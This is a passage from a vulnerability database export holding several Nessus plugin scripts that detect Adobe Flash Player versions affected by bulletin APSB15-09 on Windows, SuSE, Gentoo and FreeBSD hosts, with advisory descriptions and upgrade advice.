74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.169. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.188 or later.\n\nAlternatively, Adobe has made version 13.0.0.289 available for those\ninstallations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 17.0.0.134\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"17.0.0.169\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.277\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.281\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-17 <= 17.0.0.134\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4567]\\.\" &&\n ver_compare(ver:ver,fix:\"17.0.0.169\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser plugin (for Firefox / Netscape / Opera)';\n fix = \"17.0.0.188 / 13.0.0.289\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"17.0.0.188 / 13.0.0.289\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to the latest version of Google Chrome.\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 17.0.0.188 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:17:18", "description": "The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues :\n\nAPSB15-09, CVE-2015-3044 / CVE-2015-3077 / CVE-2015-3078 /\nCVE-2015-3079 / CVE-2015-3080 / CVE-2015-3081 / CVE-2015-3082 /\nCVE-2015-3083 / CVE-2015-3084 / CVE-2015-3085 / CVE-2015-3086 /\nCVE-2015-3087 / CVE-2015-3088 / CVE-2015-3089 / CVE-2015-3090 /\nCVE-2015-3091 / CVE-2015-3092 / CVE-2015-3093.\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html\n.", "edition": 24, "published": "2015-05-15T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10680)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-15T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150514.NASL", "href": "https://www.tenable.com/plugins/nessus/83486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83486);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10680)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues :\n\nAPSB15-09, CVE-2015-3044 / CVE-2015-3077 / CVE-2015-3078 /\nCVE-2015-3079 / CVE-2015-3080 / CVE-2015-3081 / CVE-2015-3082 /\nCVE-2015-3083 / CVE-2015-3084 / CVE-2015-3085 / CVE-2015-3086 /\nCVE-2015-3087 / CVE-2015-3088 / CVE-2015-3089 / CVE-2015-3090 /\nCVE-2015-3091 / CVE-2015-3092 / CVE-2015-3093.\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html\n.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=930677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3044.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3077.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3078.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3080.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3083.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3084.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3087.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3088.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3090.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3091.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3092.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3093.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10680.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.460-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:37", "description": "The remote host is affected by the vulnerability described in GLSA-201505-02\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2015-06-01T00:00:00", "title": "GLSA-201505-02 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-06-01T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201505-02.NASL", "href": "https://www.tenable.com/plugins/nessus/83911", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201505-02.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83911);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_bugtraq_id(74065, 74605, 74608, 74609, 74610, 74612, 74613, 74614, 74616, 74617);\n script_xref(name:\"GLSA\", value:\"201505-02\");\n\n script_name(english:\"GLSA-201505-02 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201505-02\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201505-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.460'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.460 \"), vulnerable:make_list(\"lt 11.2.202.460 \"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:50:51", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe recommends users update their product\ninstallations to the latest versions.\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\nCVE-2015-3093).\n\nThese updates resolve a heap overflow vulnerability that could lead to\ncode execution (CVE-2015-3088).\n\nThese updates resolve a time-of-check time-of-use (TOCTOU) race\ncondition that could be exploited to bypass Protected Mode in Internet\nExplorer (CVE-2015-3081).\n\nThese updates resolve validation bypass issues that could be exploited\nto write arbitrary data to the file system under user permissions\n(CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\nThese updates resolve an integer overflow vulnerability that could\nlead to code execution (CVE-2015-3087).\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\nThese updates resolve a use-after-free vulnerability that could lead\nto code execution (CVE-2015-3080).\n\nThese updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\nThese updates resolve a security bypass vulnerability that could lead\nto information disclosure (CVE-2015-3079), and provide additional\nhardening to protect against CVE-2015-3044.", "edition": 21, "published": "2015-05-14T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (e206df57-f97b-11e4-b799-c485083ca99c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_E206DF57F97B11E4B799C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/nessus/83442", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83442);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (e206df57-f97b-11e4-b799-c485083ca99c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe recommends users update their product\ninstallations to the latest versions.\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\nCVE-2015-3093).\n\nThese updates resolve a heap overflow vulnerability that could lead to\ncode execution (CVE-2015-3088).\n\nThese updates resolve a time-of-check time-of-use (TOCTOU) race\ncondition that could be exploited to bypass Protected Mode in Internet\nExplorer (CVE-2015-3081).\n\nThese updates resolve validation bypass issues that could be exploited\nto write arbitrary data to the file system under user permissions\n(CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\nThese updates resolve an integer overflow vulnerability that could\nlead to code execution (CVE-2015-3087).\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\nThese updates resolve a use-after-free vulnerability that could lead\nto code execution (CVE-2015-3080).\n\nThese updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\nThese updates resolve a security bypass vulnerability that could lead\nto information disclosure (CVE-2015-3079), and provide additional\nhardening to protect against CVE-2015-3044.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n # https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a17f5a38\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 